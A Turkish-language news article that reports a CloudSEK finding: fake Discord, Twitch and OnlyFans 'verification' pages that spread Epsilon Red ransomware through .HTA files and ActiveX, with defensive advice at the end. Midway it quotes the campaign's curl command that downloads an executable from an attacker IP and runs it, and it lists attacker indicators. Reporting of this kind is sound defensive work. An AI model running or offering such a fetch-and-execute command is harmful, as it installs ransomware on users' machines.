OnlyFans ve Discord ClickFix Temalı Sayfalar Epsilon Red Fidye Yazılımını Yayıyor

Gelişmiş bir yeni fidye yazılımı kampanyası, Epsilon Red adlı tehlikeli bir tehdidi yaymak için sahte doğrulama sayfaları kullanarak dünya çapındaki internet kullanıcılarını aktif olarak kandırıyor.

Bu kritik bulgu, önde gelen siber güvenlik firması CloudSEK'in en son tehdit istihbarat raporunda ortaya çıktı. İlk olarak Temmuz 2025'te tespit edilen ve devam eden saldırı, saldırganların Discord , Twitch ve OnlyFans gibi popüler çevrimiçi servisler gibi davrandığı sosyal mühendislik yöntemini kullanıyor. Saldırganlar, kişileri kötü amaçlı .HTA dosyalarını indirmeleri için kandırıyor. Bu dosyalar, komut dosyalarını doğrudan bilgisayarda çalıştırabilen özel HTML Uygulamaları.

CloudSec'e göre, bir kurban sahte ClickFix temalı doğrulama sayfalarından birine girdiğinde ve bu sayfayla etkileşime girdiğinde, kötü amaçlı komutlar onların bilgisi olmadan arka planda çalışıyor.

Bu, web tarayıcılarında etkileşimli içeriklere olanak tanıyan bir teknoloji olan ActiveX kötüye kullanımı yoluyla gerçekleşir. Bu saldırıda, kötü amaçlı komut dosyası, normal güvenlik kontrollerini atlatarak Epsilon Red fidye yazılımını gizli bir konumdan sessizce indirip çalıştırır.

Hackread.com ile paylaşılan CloudSEK analizi , kullanıcının tipik bir indirme penceresi görmesine gerek kalmadan fidye yazılımını indirip çalıştıran curl -s -o a.exe http://155.94.155227:2269/dw/vir.exe && a.exe komutlarını ortaya çıkardı.

Ardından sahte bir doğrulama mesajı görüntülenerek, kullanıcı her şeyin normal olduğunu düşünmeye yönlendirilir. Sahte mesajda dikkat çeken nokta, "Doğrulama" adında küçük bir yazım hatasının bulunmasıdır; bu, daha az şüpheli görünmek için kasıtlı olarak eklenmiş bir ayrıntı olabilir.

Bu keşfi gerçekleştiren CloudSEK'in TRIAD ekibi, zararlı komutları panoya kopyalayan benzer saldırıların eski versiyonlarının aksine, bu yeni versiyonun kurbanları enfeksiyonun herhangi bir açık uyarı olmadan gerçekleştiği ikinci bir sayfaya yönlendirdiğini belirtti.

Bu kampanyayı destekleyen altyapı, sahte bir Discord Captcha Bot'u da dahil olmak üzere, meşru hizmetler gibi görünmek üzere tasarlanmış birkaç sahte alan adı ve IP adresi içeriyor. Ayrıca bazı flört veya aşk temalı tuzak sayfaları da buldular. Ayrıca, bu kampanyayla bağlantılı bir başka kötü amaçlı yazılım olan Quasar RAT da vardı ve bu da fidye yazılımının yanı sıra uzaktan kontrol potansiyeline işaret ediyordu.

İlk olarak 2021'de görülen Epsilon Red fidye yazılımı, bilinen REvil fidye yazılımına benzeyen fidye notları bırakıyor; ancak çalışma biçimleri açısından birbirlerinden farklılar. Bu durum, farklı fidye yazılımı gruplarının birbirlerinden bazı öğeler ödünç alabileceği bir eğilimi gözler önüne seriyor.

CloudSEK, bu yeni tehdide karşı korunmak için birkaç önemli adım öneriyor. Kullanıcılar, bu tür betik yürütmelerini engellemek için bilgisayarlarının ayarlarından ActiveX ve Windows Script Host'u (WSH) devre dışı bırakmalıdır. Kuruluşlar ayrıca, twtichcc ve 155.94.155227:2269 gibi bilinen saldırgan IP adreslerini ve etki alanlarını anında engellemek için tehdit istihbarat akışlarını kullanmalıdır.

Ayrıca, uç nokta güvenlik araçları, web tarayıcılarından sessizce çalışan programlar gibi olağandışı gizli etkinlikleri tespit edecek şekilde ayarlanmalıdır. Son olarak, kullanıcılara sahte doğrulama sayfalarını ve sosyal mühendislik girişimlerini, tanıdık çevrimiçi platformları taklit etseler bile, tanımayı ve bunlardan kaçınmayı öğreten sürekli güvenlik farkındalığı eğitimleri hayati önem taşımaktadır.